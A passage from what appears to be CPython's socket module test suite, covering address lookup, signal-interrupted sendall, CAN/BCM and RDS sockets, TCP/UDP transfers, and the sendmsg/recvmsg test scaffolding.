a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test the workaround for an OS X platform bug (segfault)
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care about here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
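# (math.acosh(0) is a domain error: the underlying libm call sets the C
# errno to EDOM before Python raises ValueError, so these handlers check
# that sendall()'s error reporting does not depend on errno surviving a
# Python-level signal handler.)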
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object keeps the socket alive: the ResourceWarning
# is only emitted once the file object is dereferenced as well.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
@unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
def test_unknown_socket_family_repr(self):
# Test that, when created with a family and type that are not among the
# known AF_*/SOCK_* constants, socket.family and socket.type just return
# the raw numbers.
#
# To do this we fool socket.socket into believing it already has an
# open fd, because on this path it doesn't actually verify the family and
# type; it simply populates the socket object with them.
#
# On Windows this trick won't work, so the test is skipped.
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
with socket.socket(family=42424, type=13331, fileno=fd) as s:
self.assertEqual(s.family, 42424)
self.assertEqual(s.type, 13331)
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, so use 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
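# Note: can_frame_fmt is defined on the CAN socket test base class,
# outside this excerpt.  It is expected to describe struct can_frame from
# <linux/can.h> -- a 32-bit CAN ID, an 8-bit DLC, padding, and 8 data
# bytes (e.g. "=IB3x8s") -- so build_can_frame() and dissect_can_frame()
# above are simple pack/unpack wrappers around that layout.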
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
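# The header packed below mirrors struct bcm_msg_head from
# <linux/can/bcm.h>: opcode, flags, count, two interval timestamps
# (seconds/usec pairs), the CAN ID, and the number of frames that follow.
# bcm_cmd_msg_fmt itself is defined on the CAN socket test base class,
# outside this excerpt.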
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testCongestion(self):
# wait until the sender is done
self.evt.wait()
def _testCongestion(self):
# test the behavior in case of congestion
self.data = b'fill'
self.cli.setblocking(False)
try:
# try to lower the receiver's socket buffer size
self.cli.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 16384)
except OSError:
pass
with self.assertRaises(OSError) as cm:
try:
# fill the receiver's socket buffer
while True:
self.cli.sendto(self.data, 0, (HOST, self.port))
finally:
# signal the receiver we're done
self.evt.set()
# sendto() should have failed with ENOBUFS
self.assertEqual(cm.exception.errno, errno.ENOBUFS)
# and we should have received a congestion notification via select()
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
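# As a rough sketch (names here are illustrative only -- the real
# concrete combinations are defined further down in the module), a final
# test class is assembled like:
#
#     class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
#         pass
#
# where SendrecvmsgUDPTestBase mixes SendrecvmsgConnectionlessBase (plus
# the datagram msg_flags checks) into a UDP-specific SocketTestBase
# subclass, and RecvmsgIntoTests can be substituted for RecvmsgTests to
# repeat the same tests via recvmsg_into().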
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
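# For example, with a connectionless socket whose
# sendmsg_to_server_defaults is ([], [], 0, serv_addr), a call of
# sendmsgToServer([MSG]) expands to
# cli_sock.sendmsg([MSG], [], 0, serv_addr).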
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
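# For example, on a datagram socket (where msg_flags_non_eor_indicator
# includes MSG_TRUNC), checkFlags(flags, eor=False) requires MSG_TRUNC to
# be set, checkFlags(flags, eor=True) requires it to be unset, and
# passing ignore=MSG_TRUNC skips that particular check.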
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
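# recvmsg_into() reports the number of bytes written rather than
# returning the data itself, so the mixin rebuilds a recvmsg()-shaped
# (data, ancdata, msg_flags, address) tuple from the filled buffer,
# letting the generic tests run unchanged against either method.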
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
